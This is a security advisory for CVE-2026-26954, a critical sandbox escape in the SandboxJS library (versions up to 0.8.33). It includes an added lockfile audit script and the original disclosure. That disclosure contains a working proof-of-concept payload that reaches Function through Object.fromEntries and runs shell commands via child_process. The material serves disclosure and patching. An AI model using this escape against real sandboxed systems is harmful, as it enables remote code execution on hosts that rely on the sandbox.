CVSS 3.1 (GHSA): 10.0
SandboxJS allows attackers to execute arbitrary system commands
GHSA-6r9f-759j-hjgv
CVE-2026-26954
Summary
Attackers can use a specific technique to escape the restrictions of SandboxJS, potentially allowing them to execute system commands and gain unauthorized access to a system. This is a significant risk, as it could allow an attacker to take control of a system. To mitigate this risk, update to a patched version of SandboxJS or consider alternative sandboxing solutions.
What to do
- Update nyariv sandboxjs to version 0.8.34.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| nyariv | sandboxjs | <= 0.8.33 | 0.8.34 |
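As an added example (not part of the advisory or the SandboxJS project), a small audit that flags installed copies inside the affected range. It assumes the npm package name is `@nyariv/sandboxjs` and an npm lockfile (v2/v3) with a `packages` map; the lockfile below is constructed.

```javascript
// Added example (not from the advisory): audit a package-lock.json for
// nyariv sandboxjs installs at or below 0.8.33. Assumes the npm package name
// is "@nyariv/sandboxjs" and a lockfileVersion >= 2 "packages" map.
const FIXED = [0, 8, 34];            // first patched release per the advisory
const PACKAGE = '@nyariv/sandboxjs'; // assumed npm package name

// Parse "MAJOR.MINOR.PATCH" into numbers; prerelease tags are ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  return m ? m.slice(1, 4).map(Number) : null;
}

// Numeric comparison of two [major, minor, patch] triples.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True when the version is <= 0.8.33 (the advisory's affected range).
function isAffected(version) {
  const parsed = parseVersion(version);
  if (!parsed) return true; // treat unparsable versions as suspect
  return compareVersions(parsed, FIXED) < 0;
}

// Walk the lockfile's "packages" map and return every affected install path,
// including nested copies under other dependencies' node_modules.
function auditLock(lock) {
  const hits = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = entry.name || path.split('node_modules/').pop();
    if (name === PACKAGE && isAffected(entry.version)) {
      hits.push({ path, version: entry.version });
    }
  }
  return hits;
}

// Constructed sample lockfile: one patched top-level copy, one nested vulnerable copy.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    'node_modules/@nyariv/sandboxjs': { version: '0.8.34' },
    'node_modules/some-plugin/node_modules/@nyariv/sandboxjs': { version: '0.8.33' },
  },
};

console.log(auditLock(SAMPLE_LOCK)); // only the nested 0.8.33 copy is reported
```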
Original title
SandboxJS affected by a Sandbox Escape
Original description
### Summary
It is possible to obtain arrays containing `Function`, which allows escaping the sandbox.
### Details
There are various ways to get an array containing `Function`, e.g.
```js
Object.entries(this).at(1) // [ 'Function', [Function: Function] ]
Object.values(this).slice(1, 2) // [ [Function: Function] ]
```
Given an array containing `Function`, and `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox.
### PoC
```js
const s = require('.').default;
const sb = new s();
const payload = `
const p = (async function () {})();
({
"finally": p.finally,
...Object.fromEntries([['then', ...Object.values(this).slice(1)]]),
}).finally('a=process.getBuiltinModule("child_process").execSync("ls", {stdio: "inherit"})')();
`;
sb.compile(payload)().run();
```
### Impact
Sandbox Escape -> RCE
Vulnerability type: CWE-94 (Code Injection)
Published: 13 Mar 2026 · Updated: 14 Mar 2026 · First seen: 13 Mar 2026